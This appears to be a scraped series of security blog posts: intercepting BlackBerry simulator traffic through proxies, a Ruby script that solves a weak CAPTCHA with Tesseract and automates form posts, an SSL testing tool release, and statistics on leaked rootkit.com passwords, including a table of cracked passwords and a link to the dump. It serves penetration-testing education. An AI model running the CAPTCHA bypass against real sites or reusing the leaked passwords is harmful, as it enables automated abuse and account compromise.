<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXf1EekU6o-UlgGzCRAexQBLjRZSnU61elvfIpuIdzwwxApI6KJ0Ndty2jjKwsuYbS17bcd9HzLgXzoXaChHr2DXM6CuXoLm-vc1fK_SHMhktUd0P6sH7UEd2KpW-IXpEi9eIc-eAvrk/s1600/p4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinXf1EekU6o-UlgGzCRAexQBLjRZSnU61elvfIpuIdzwwxApI6KJ0Ndty2jjKwsuYbS17bcd9HzLgXzoXaChHr2DXM6CuXoLm-vc1fK_SHMhktUd0P6sH7UEd2KpW-IXpEi9eIc-eAvrk/s320/p4.png" width="320" /></a></div>
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">Reddit</span></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnyru4oi0Xk67ieHrKuyQFndqAQ2tjQjKTh2a8QkWydlKbEOL4gsGJPq7w4GEuSGoqj6yA031WNouap7-7ipiNJoOhynkackJy1HHip7YZ8Fl8c2C5pMF_NKy7IcOWbJ-ZST3a0iNwAEU/s1600/p5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnyru4oi0Xk67ieHrKuyQFndqAQ2tjQjKTh2a8QkWydlKbEOL4gsGJPq7w4GEuSGoqj6yA031WNouap7-7ipiNJoOhynkackJy1HHip7YZ8Fl8c2C5pMF_NKy7IcOWbJ-ZST3a0iNwAEU/s320/p5.png" width="320" /></a></div>
<br />
<br />
<h2>
<span class="Apple-style-span" style="font-size: small;">eBay</span></h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBfJCFQybuQzVHMQLvi8l5jQSPOy-IcQ3ArXj62nN9x1wfS3flziJKu5dkwJNpkyd5SNipbIukh8285EK7hcDDRat6EEpZkUpSmvME9YSEuF_HhpD-qzCguI_mPAysyJ4M80nVljgGl8/s1600/p6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPBfJCFQybuQzVHMQLvi8l5jQSPOy-IcQ3ArXj62nN9x1wfS3flziJKu5dkwJNpkyd5SNipbIukh8285EK7hcDDRat6EEpZkUpSmvME9YSEuF_HhpD-qzCguI_mPAysyJ4M80nVljgGl8/s320/p6.png" width="320" /></a></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com13tag:blogger.com,1999:blog-4663432300421783651.post-72970701837750795692011-06-17T00:00:00.000-07:002012-07-05T20:40:43.176-07:00Intercepting Blackberry Application Traffic<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Intercepting mobile traffic is one of the key areas of mobile application penetration testing and Blackberry mobile applicatiosn are no different. In this post, we will look at methods of intercepting blackberry application traffic.<br />
<br />
It is important to note that the standalone blackberry simulator does not offer any mechanism to route HTTP traffic over a web proxy. To use a web proxy for traffic interception, one has to use blackberry device simulator + MDS and email simulator. Assuming you have both installed, following steps will allow you to intercept blackberry web traffic.<br />
<br />
<b>Case 1: Routing HTTP traffic via web proxy:</b><br />
<br />
<ol style="text-align: left;">
<li>Browse to "\Program Files\Research In Motion\BlackBerry Email and MDS Services Simulators #.#.#\MDS\config"</li>
<li>Open the rimpublic.property file</li>
<li>Under the HTTP HANDLER section, add your web proxy configuration information:</li>
</ol>
<div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">application.handler.http.proxyEnabled=true</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">application.handler.http.proxyHost=<your proxy address></span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">application.handler.http.proxyPort=<your proxy port></span></div>
</div>
<br />
The following image shows the rimpublic.property file HTTP HANDLER section for fiddler running on port 8888 on localhost.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTocdj4RtU7ZvDf7O3fgvDGWjbXkV9Bl5rhnzE8kYDCFAcb0Kw8INEgmvcb0J1ntRI9zM2o7ZzoBlPd2S9mdumCRI6sEAGxTz750DlJptH7Rum8DFVknfv2nYruor4MhO_pITSbiIIsbe/s1600/config--file.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTocdj4RtU7ZvDf7O3fgvDGWjbXkV9Bl5rhnzE8kYDCFAcb0Kw8INEgmvcb0J1ntRI9zM2o7ZzoBlPd2S9mdumCRI6sEAGxTz750DlJptH7Rum8DFVknfv2nYruor4MhO_pITSbiIIsbe/s1600/config--file.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Web Proxy Configuration</td></tr>
</tbody></table>
More details on proxy configuration can be seen <a href="http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/348583/800738/800792/801079/How_To_-_Configure_the_BlackBerry_MDS_simulator_to_work_behind_a_proxy.html?nodeid=800740&vernum=0">here</a>. Once you save these settings and launch MDS simulator, you will be able to monitor, intercept and modify all HTTP traffic. However, we still need to put in some extra work for SSL traffic.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXUGQT8uF253MbVcZrkCrvKHXEKKeNVJk5beiOLca4NFN5cTKXz9olfE-gTiU5h-Qr1R6mxeX-_yKd2A2VRG6iYf4f9fnqfmPvOtfcx9E3i2w8WlMpMtkfZaPwaSvPQPX-1BIDjKTsy0Z/s1600/google--via--proxy.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXUGQT8uF253MbVcZrkCrvKHXEKKeNVJk5beiOLca4NFN5cTKXz9olfE-gTiU5h-Qr1R6mxeX-_yKd2A2VRG6iYf4f9fnqfmPvOtfcx9E3i2w8WlMpMtkfZaPwaSvPQPX-1BIDjKTsy0Z/s640/google--via--proxy.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows HTTP traffic captured for google.com</td></tr>
</tbody></table>
<br />
<br />
<b>Case 2: Routing HTTPS traffic via web proxy:</b><br />
The above mentioned configuration was not successful when attempted on SSL traffic. It was time for some workaround and I thought of using a reverse proxy. The idea of using reverse proxy had some limitations but it worked seamlessly and allowed me to intercept SSL traffic for a particular domain. To demonstrate this concept, I will be using Charles Proxy's Reverse Proxy. You can use any reverse proxy of your own choice. Lets configure the Charles proxy now.<br />
<ol style="text-align: left;">
<li>Obtain the IP address to which the application/browser talks</li>
<li>Obtain the IP for the target domain. nslookup for mail.google.com revealed four DNS entries(74.125.226.184, 74.125.226.182, 74.125.226.181, 74.125.226.183) and one of them was chosen to be destination for reverse proxy settings. See the screenshots below for Charles Reverse Proxy settings.</li>
<li>In the hosts file make an entry to forward all the target domain address to the IP at which reverse proxy is hosted. In our case, I entered the following for mail.google.com<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">127.0.0.1<span class="Apple-tab-span" style="white-space: pre;"> </span>mail.google.com</span></li>
<li>Now launch your browser and access https://mail.google.com</li>
<li>The blackberry simulator will issue a certificate error. Choose the "Trust Certificate" option, provide certificate store password and the save your settings.</li>
<li>All the traffic will be routed via Charles now. Enjoy!</li>
</ol>
<div>
<br /></div>
<div style="text-align: left;">
To summarize reverse proxy settings (Two sets of entries):<br />
<b>Entry 1:</b> To ensure that all SSL traffic is forwarded to mail.google.com:443<br />
Listening on : 127.0.0.1:443<br />
Forwarding to: 74.125.226.181:443 #one<br />
<br />
<b>Entry 2: </b>To ensure that all plain HTTP is forwarded too<br />
Listening on : 127.0.0.1:80<br />
Forwarding to: 74.125.226.181:80</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj486r4NgXWlR3bSJ6BPQ8WdJ1-myQPWlFrosAaQov0S9zArmNNGlIM8-MAD43WRXwn2uMF1zOnOpMXNrtXqt3fVUHyUT0mq4sAv2GBi2wiXhbo63hcSQoWM3QWMOwfMxDggsqSX3NfC4XQ/s1600/reverse--proxy--settings.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj486r4NgXWlR3bSJ6BPQ8WdJ1-myQPWlFrosAaQov0S9zArmNNGlIM8-MAD43WRXwn2uMF1zOnOpMXNrtXqt3fVUHyUT0mq4sAv2GBi2wiXhbo63hcSQoWM3QWMOwfMxDggsqSX3NfC4XQ/s1600/reverse--proxy--settings.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows reverse proxy settings in Charles</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPes6gQexQTxATZmV8Ia_r6WbHwZnMRFo9_A5Xvp49bjOJkYbtRXr9qjHHAWN-Zu1XbRGD8E3jZe0f5ZySFB8jgAEOZouI3ccO1HjIcAo4l2vcqNmPYG30yCU2uyD5PSrYLijnwM7dCCWO/s1600/gmail--error.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPes6gQexQTxATZmV8Ia_r6WbHwZnMRFo9_A5Xvp49bjOJkYbtRXr9qjHHAWN-Zu1XbRGD8E3jZe0f5ZySFB8jgAEOZouI3ccO1HjIcAo4l2vcqNmPYG30yCU2uyD5PSrYLijnwM7dCCWO/s400/gmail--error.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows the certificate error issued when https://mail.google.com is access via reverse proxy. Choosing the "Trust Certificate" options allows SSL traffic to be intercepted.</td></tr>
</tbody></table>
<br /></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com21tag:blogger.com,1999:blog-4663432300421783651.post-76316961467521101272011-03-19T08:59:00.000-07:002011-03-20T00:57:37.178-07:00Breaking A Weak CAPTCHA implementation<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: inherit;">A while back I came across a web application that implemented captcha to prevent automated form entries. The captcha was weak and could be easily solved. Below I summarize the steps followed and provide sample ruby scripts that were used to perform automated form submissions. The page names, form fields etc... are fictitious and do not reflect the exact application data/behavior.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">So lets get started. Here is one sample captcha obtained from the website.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlib5foHa52bFP4QwlWYlU_sMMWakCY_TxPPz51l-FbNTDKbGA7pPp9vr7ZTtkVE9OWbjBUZ1nYd2vMXOtIRDn35XwWjgQKCLl7p53padgtp0mCLUkIhVh_gX0y6Z0gwBU5jVTj1ZnUpam/s1600/19.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlib5foHa52bFP4QwlWYlU_sMMWakCY_TxPPz51l-FbNTDKbGA7pPp9vr7ZTtkVE9OWbjBUZ1nYd2vMXOtIRDn35XwWjgQKCLl7p53padgtp0mCLUkIhVh_gX0y6Z0gwBU5jVTj1ZnUpam/s1600/19.bmp" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">My first thought was to try the free "OCR to text" conversion service provided by guys at <a href="http://www.free-ocr.com/">Free-Ocr</a>. I uploaded few captchas to the website and it could successfully solve almost all of them. One solved capcha is shown below.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxGhWYHNxCnkUXGXYziB2Wi3Bo6RoWZYd1bZiaE0YNvViq8O7xG73KlAwKdXanaRgUSiVrRSotgE7H8skSvSuVyRSitvEOSe5qRS02N12BU18VfdhLWMUa8v0x_cucdUkMuCZrEyuWBdY8/s1600/free--ocr--ss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxGhWYHNxCnkUXGXYziB2Wi3Bo6RoWZYd1bZiaE0YNvViq8O7xG73KlAwKdXanaRgUSiVrRSotgE7H8skSvSuVyRSitvEOSe5qRS02N12BU18VfdhLWMUa8v0x_cucdUkMuCZrEyuWBdY8/s320/free--ocr--ss.png" width="320" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Now I knew that the CAPTCHA can be solved, and needed a way to automate the process of solving the captcha. I turned to <a href="http://code.google.com/p/tesseract-ocr/">Tesseract</a> to do that for me. Tesseact enjoys the reputation of being <span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;">one of the most accurate open source OCR engines available.</span></span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: inherit; line-height: 16px;"><br />
</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: inherit; line-height: 16px;">Tesseact was downloaded and installed on a windows box. The page requiring captcha input was sourcing captcha's from a php script on the web server. Lets say its path is http://www.test.com/get_captcha.php. The following script helped download a sample captcha, stored it on local file system and then solved it. </span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">require 'net/http'</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">tesseract = 'C:\Tesseract-OCR\tesseract.exe'</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">q = Net::HTTP.new('www.test.com',80)</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;"># Download new captcha</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">r = q.get("/get_captcha.php")</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">File.open("captcha.bmp",'wb') do |f|</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;"><span class="Apple-tab-span" style="white-space: pre;"> </span>f.puts r.body</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">end</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;"># Solve the CAPTCHA</span><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: 'Courier New', Courier, monospace; line-height: 16px;">system("#{tesseract} captcha.bmp captcha") #Output gets stored in captcha.txt</span><br />
<div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">Most of the sourced captchas could be successfully solved using the script above. Good! </span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">The next obvious step was to automate the entire process of form submissions. The application used <span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; line-height: 15px;"><em style="font-style: normal;">PHPSESSIONID</em></span> to associate captchas with sessions. http://www.test.com/home.php was issuing the PHPSESSIONID and the same sesssion value was being sent to <b>/get_captcha.php </b>to retrieve a captcha. To automated the process, following was required:</span></div><div><ol style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px; text-align: left;"><li><span class="Apple-style-span" style="font-family: inherit;">GET /home.php page and capture the value of PHPSESSIONID.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Retrieve a captcha by accessing /get_captcha.php while using the captured PHPSESSIONID.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Solve the captcha locally</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">POST the form fields along with PHPSESSIONID and the captcha value</span></li>
</ol><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">A few more lines to the script above would serve our purpose. The final script looked like below:</span></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">require 'net/http'<br />
tesseract = 'C:\Tesseract-OCR\tesseract.exe'<br />
q = Net::HTTP.new('www.test.com',80)<br />
r = q.get("/home.php")<br />
r['set-cookie'] =~ /PHPSESSIONID=(.*?);/<br />
hdr = {'Cookie' => "PHPSESSIONID=#{$1}"}<br />
#get a captcha associated with a valid PHPSESSIONID and solve it<br />
r = q.get("/get_captcha.php",hdr)<br />
File.open("captcha.bmp",'wb') do |f|<br />
f.puts r.body<br />
end<br />
system("#{tesseract} captcha.bmp captcha")<br />
#retrive the captcha value and POST the form details along with valid PHPSESSIONID<br />
captcha = File.read("captcha.txt").strip<br />
q.post('/save_details.php', "fname=gursev&lname=kalra&captcha=#{captcha}" , hdr)</span><br />
<div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px; text-align: left;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><b><span class="Apple-style-span" style="font-family: inherit;">Further Analysis:</span></b></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"><span class="Apple-style-span" style="font-family: inherit;">The captcha implementation appeared to have more issues. During the analysis around 100 captchas were solved and their values analyzed. Here are the the various observations:</span></div><div style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; line-height: 16px;"></div><ol style="text-align: left;"><li><span class="Apple-style-span" style="font-family: inherit;">Captchas contained only numerals and hence lesser number of possible combinations.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Out of 100 captchas around 4 duplicate captchas were identified. Thats around 4% of total captchas issued.</span></li>
<li><span class="Apple-style-span" style="font-family: inherit;">Captchas had uneven character distribution with 4's and 5's getting the maximum share of captcha characters. The distribution formed a bell curve with a peak at 4 and 5.</span></li>
</ol></div></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com2tag:blogger.com,1999:blog-4663432300421783651.post-56424221592775602011-02-14T09:55:00.000-08:002011-07-02T02:34:26.717-07:00SSLSmart v1.0 Released<div dir="ltr" style="text-align: left;" trbidi="on">Back in 2009, I went to local OWASP chapter meet and presented on SSL Cipher enumeration script that I was using to enumerate SSL Ciphers for my assessments. Feedback was good but soon other things piled up and the script got burried. Later I realized the need for evolving the concept into an open source and cross platform free tool; named it SSLSmart.<br />
<br />
SSLSmart was released last month and tool can be downloaded from <a href="http://packetstormsecurity.org/files/98035/SSLSmart-SSL-Testing-Tool-1.0.html">here</a> (Packetstorm). If you are interested to look at the whitepaper before downloading the entire zip file, you can obtain it from <a href="http://dl.packetstormsecurity.net/papers/general/SSLSmart_WhitePaper_V1.0.pdf">here</a> (Packetstorm).<br />
<br />
Here is how a sample SSLSmart run looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZF9T1p2Ji-9gEE_Zr2Ss2n4wBk1l__u0pqQJzhayXDyhSBYui5MfirWEGKgY2QoUb9K_PGSvpIj0279Ct_YVXQAYL0J2Ku0Qs4Xb_YCMoZzxVlthZJaQwDelF_spWxAZOqX0lY7x7ahhyphenhyphen/s1600/linux_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZF9T1p2Ji-9gEE_Zr2Ss2n4wBk1l__u0pqQJzhayXDyhSBYui5MfirWEGKgY2QoUb9K_PGSvpIj0279Ct_YVXQAYL0J2Ku0Qs4Xb_YCMoZzxVlthZJaQwDelF_spWxAZOqX0lY7x7ahhyphenhyphen/s640/linux_screenshot.png" width="619" /></a></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com1tag:blogger.com,1999:blog-4663432300421783651.post-77261778519196193642011-02-13T05:30:00.000-08:002011-02-13T21:47:07.001-08:00Rootkit.com Password Analysis<div dir="ltr" style="text-align: left;" trbidi="on">rootkit.com succumbed to a social engineering attack and more than 42000 of its user's passwords were made available on internet in clear (<a href="http://dazzlepod.com/site_media/txt/rootkit_people_cleartext.txt">here</a>). John the Ripper was used to recover the passwords. Out of curiosity, I analyzed certain aspects of passwords. The results of that analysis are shared below:<br />
<br />
<div></div><div><b>Password Lengths: </b>The shortest password in the list was 1 character long and longest was 20 characters in length. A whopping 38.74% passwords were 6 characters in length. Here is the distribution of password lengths:</div><div><div style="text-align: -webkit-auto;"><span class="Apple-style-span" style="border-collapse: collapse;"></span><br />
<table border="1"><tbody>
<tr><td><b> Length </b></td><td><b> Occurences </b></td><td><b> Percentage </b></td></tr>
<tr><td>1 </td><td>16 </td><td>0.04% </td></tr>
<tr><td>2 </td><td>20 </td><td>0.05% </td></tr>
<tr><td>3 </td><td>270 </td><td>0.64% </td></tr>
<tr><td>4 </td><td>1444 </td><td>3.41% </td></tr>
<tr><td>5 </td><td>2646 </td><td>6.24% </td></tr>
<tr><td>6 </td><td>16424 </td><td>38.76% </td></tr>
<tr><td>7 </td><td>8258 </td><td>19.49% </td></tr>
<tr><td>8 </td><td>9786 </td><td>23.09% </td></tr>
<tr><td>9 </td><td>2029 </td><td>4.79% </td></tr>
<tr><td>10 </td><td>971 </td><td>2.29% </td></tr>
<tr><td>11 </td><td>250 </td><td>0.59% </td></tr>
<tr><td>12 </td><td>157 </td><td>0.37% </td></tr>
<tr><td>13 </td><td>62 </td><td>0.15% </td></tr>
<tr><td>14 </td><td>23 </td><td>0.05% </td></tr>
<tr><td>15 </td><td>8 </td><td>0.02% </td></tr>
<tr><td>16 </td><td>3 </td><td>0.01% </td></tr>
<tr><td>17 </td><td>1 </td><td>0.00% </td></tr>
<tr><td>18 </td><td>0 </td><td>0.00% </td></tr>
<tr><td>19 </td><td>2 </td><td>0.00% </td></tr>
<tr><td>20 </td><td>4 </td><td>0.01% </td></tr>
</tbody></table><br />
<b>Password Entropy:</b><br />
Entropy of various cracked passwords was calculated using Eric Monti's <a href="http://emonti.github.com/rbkb/">rbkb</a>'s entropy function that performs chi-square calculation. Clearly, higher the entropy, lesser chances that your password will be guessed or cracked. Having said that, how easy is to remember and key in the passwords that are extremely random and are more than 16 characters in length?<br />
<br />
<table border="1"><tbody>
<tr><td><b> Entropy </b></td><td><b> Count </b></td></tr>
<tr><td>0 to <1 </td><td>1620 </td></tr>
<tr><td>1 to <2 </td><td>7388 </td></tr>
<tr><td>2 to <3 </td><td>32071 </td></tr>
<tr><td>3 to <4 </td><td>1292 </td></tr>
<tr><td>4 to <5 </td><td>3 </td></tr>
<tr><td>5 to <6 </td><td>0 </td></tr>
<tr><td>6 to <7 </td><td>0 </td></tr>
</tbody></table><br />
<br />
<br />
<b>Cracked Passwords with Highest Entropy: </b><br />
Certain cracked passwords had entropy in excess of 4 bits. Table below lists down the cracked passwords with highest entropy. A good dictionary allowed JTR to crack most of the passwords.<br />
<br />
<table border="1"><tbody>
<tr><td><b> # </b></td><td><b> Entropy </b></td><td><b> Password </b></td></tr>
<tr><td>1 </td><td>4.321928095 </td><td>q1w2e3r4t5y6u7i8o9p0 </td></tr>
<tr><td>2 </td><td>4.321928095 </td><td>1234567890qwertyuiop </td></tr>
<tr><td>3 </td><td>4.321928095 </td><td>1q2w3e4r5t6y7u8i9o0p </td></tr>
<tr><td>4 </td><td>4 </td><td>1234qwerasdfzxcv </td></tr>
<tr><td>5 </td><td>3.807354922 </td><td>abcdefg1234567 </td></tr>
<tr><td>6 </td><td>3.700439718 </td><td>qwertyuiop123 </td></tr>
<tr><td>7 </td><td>3.700439718 </td><td>superman12345 </td></tr>
<tr><td>8 </td><td>3.700439718 </td><td>1qazxcvbnm,./ </td></tr>
<tr><td>9 </td><td>3.664497779 </td><td>kingoftheworld </td></tr>
<tr><td>10 </td><td>3.664497779 </td><td>qwertyuiop[]\\ </td></tr>
<tr><td>11 </td><td>3.584962501 </td><td>!@#$%^&*()_+ </td></tr>
<tr><td>12 </td><td>3.584962501 </td><td>fucktheworld </td></tr>
<tr><td>13 </td><td>3.584962501 </td><td>1q2w3e!Q@W#E </td></tr>
<tr><td>14 </td><td>3.584962501 </td><td>qazxswedcvfr </td></tr>
<tr><td>15 </td><td>3.584962501 </td><td>123qweasdzxc </td></tr>
<tr><td>16 </td><td>3.584962501 </td><td>1qazxsw23edc </td></tr>
<tr><td>17 </td><td>3.584962501 </td><td>q1w2e3r4t5y6 </td></tr>
<tr><td>18 </td><td>3.584962501 </td><td>asdfghjkl;\' </td></tr>
<tr><td>19 </td><td>3.584962501 </td><td>qwerty123456 </td></tr>
<tr><td>20 </td><td>3.584962501 </td><td>4rfv5tgb6yhn </td></tr>
<tr><td>21 </td><td>3.584962501 </td><td>qwe123rty456 </td></tr>
<tr><td>22 </td><td>3.584962501 </td><td>1qaz2wsx3edc </td></tr>
<tr><td>23 </td><td>3.584962501 </td><td>1a2b3c4d5e6f </td></tr>
<tr><td>24 </td><td>3.584962501 </td><td>123456qwerty </td></tr>
<tr><td>25 </td><td>3.584962501 </td><td>1q2w3e4r5t6y </td></tr>
</tbody></table><br />
<br />
<b>Password Distribution:</b><br />
Finally, I looked at password distribution. An overwhelming 51% of cracked passwords were only in lowercase, this was followed by only numeric passwords close to 24%. Passwords using uppercase alphabets along with numerics were least favorite.<br />
<br />
<table border="1"><tbody>
<tr><td><b> Password Type </b></td><td><b> Percentage Share </b></td></tr>
<tr><td>Only Lowercase </td><td>51.81 </td></tr>
<tr><td>Lowercase AND Numerals </td><td>23.92 </td></tr>
<tr><td>Only Numeric </td><td>19.9 </td></tr>
<tr><td>Alphabets (Uppercase AND Lowercase) </td><td>1.32 </td></tr>
<tr><td>Alphanumeric </td><td>1.25 </td></tr>
<tr><td>Passwords With Special Characters </td><td>1.11 </td></tr>
<tr><td>Only Uppercase </td><td>0.45 </td></tr>
<tr><td>Uppercase AND Numerals </td><td>0.24 </td></tr>
</tbody></table><br />
<br />
<br />
<br />
</div></div></div>Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com0tag:blogger.com,1999:blog-4663432300421783651.post-72089729946049027852009-09-12T00:33:00.000-07:002013-09-23T12:17:32.750-07:00Ruby and OpenSSL Based SSL Cipher Enumeration<div dir="ltr" style="text-align: left;" trbidi="on">
In this post, we will write our bare bones Ruby based SSL cipher enumerator to enumerate SSL cipher suites supported by a webserver. Without further delay, lets get started.<br />
<br />
<span style="font-weight: bold;">Basics:</span><br />
